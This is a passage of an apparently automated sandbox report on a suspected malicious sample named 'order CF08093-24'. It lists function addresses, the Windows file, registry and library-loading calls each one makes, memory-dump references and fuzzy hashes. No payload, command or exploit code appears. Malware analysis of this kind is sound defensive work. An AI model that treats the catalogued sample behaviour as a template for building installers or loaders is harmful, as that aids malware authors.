                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                                                              • Part of subcall function 004068C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                                                              • Part of subcall function 004068C5: wsprintfW.USER32 ref: 00406917
                                                                              • Part of subcall function 004068C5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2547128583-0
                                                                            • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                            • Instruction ID: 5f896a6f513cb693e05c26686958cbb9026995673407ad46a654cc37c4de4e39
                                                                            • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                            • Instruction Fuzzy Hash: BCE0CD73604310EBD61067755D0493773E89F85B50302483EF947F2140D734DC32A7AA
                                                                            Function 00406031 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCreate
                                                                            • String ID:
                                                                            • API String ID: 415043291-0
                                                                            • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                            • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                                            • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                            • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                                            Function 0040600C Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,?,00405C11,?,?,00000000,00405DE7,?,?,?,?), ref: 00406011
                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406025
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                            • Instruction ID: fbd6844141adfc982ff7d741096df028d7bbee698e850df9006aa2ae5f51d9dd
                                                                            • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                            • Instruction Fuzzy Hash: 24D0C972504221AFC2103728EE0889BBF55DB542717028A35F8A9A22B0CB304C668694
                                                                            Function 00405AEF Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
                                                                            • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B03
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1375471231-0
                                                                            • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                            • Instruction ID: c3646108da72950d5b730f2af08982bf7448ccd78712563759f5c9f930c8cbe9
                                                                            • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                            • Instruction Fuzzy Hash: 11C04C70244906DAD6509B219F0C71779A0EB50781F195839A586E50A0DA34B455D92D
                                                                            Function 004063DC Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406405
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                            • Instruction ID: 15c5175e75f921513b7f3d75ccef30e451623c4c54541e9d5ee9eac1385433f3
                                                                            • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                            • Instruction Fuzzy Hash: 1DE0E6B2010109BFEF195F50DD0AD7B371DEB04310F01492EFE16D4051E6B5E9306674
                                                                            Function 004060E3 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040349F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060F7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                            • Instruction ID: b9d802e93a63440494d75fc60edee4ff4d41d1542efeb3ab79d4fb436c6ecda5
                                                                            • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                            • Instruction Fuzzy Hash: 91E08C3220422AABEF109E909C04EEB3B6CEB003A0F014432FD26E6050D271E9319BA4
                                                                            Function 004060B4 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034D1,00000000,00000000,00403328,000000FF,00000004,00000000,00000000,00000000), ref: 004060C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                            • Instruction ID: 0a9ed9335d9fcbf33a9b7557f86da276afb46ac39f2db62fb679b5cfb923300a
                                                                            • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                            • Instruction Fuzzy Hash: C1E0BF32250269ABDF109E559C00AAB775CEB05251F014436B955E7150D671E92197A4
                                                                            Function 004015C8 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015D3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 478cb40ad17b728b10cdbf16e79a2720acc2e44bc9a29048479925e3e1a41e6f
                                                                            • Instruction ID: f0c310d3f6fffa79c82dab7da22db7b00a6fee7441536bfeb36ed7c6a7bf75c0
                                                                            • Opcode Fuzzy Hash: 478cb40ad17b728b10cdbf16e79a2720acc2e44bc9a29048479925e3e1a41e6f
                                                                            • Instruction Fuzzy Hash: 94D05B72B08201DBDB00DBE89B48A9F77709B10368F30853BD111F11D4D6B9C945A71D
                                                                            Function 0040450C Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                                            • Instruction ID: 43b4292f00af6435b8222dbb4ed8e84b3d95e84959177ba0714352b3dfcaa9b9
                                                                            • Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                                            • Instruction Fuzzy Hash: 40C09BF17413017BDA209B509E45F1777989795701F15453D7350F50E0CBB4E450D61D
                                                                            Function 004034D4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 004034E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                            • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                            • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                            • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                            Function 004044F5 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                                            • Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
                                                                            • Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                                            • Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08
                                                                            Function 004044E2 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL(?,004042B9), ref: 004044EC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherUser
                                                                            • String ID:
                                                                            • API String ID: 2492992576-0
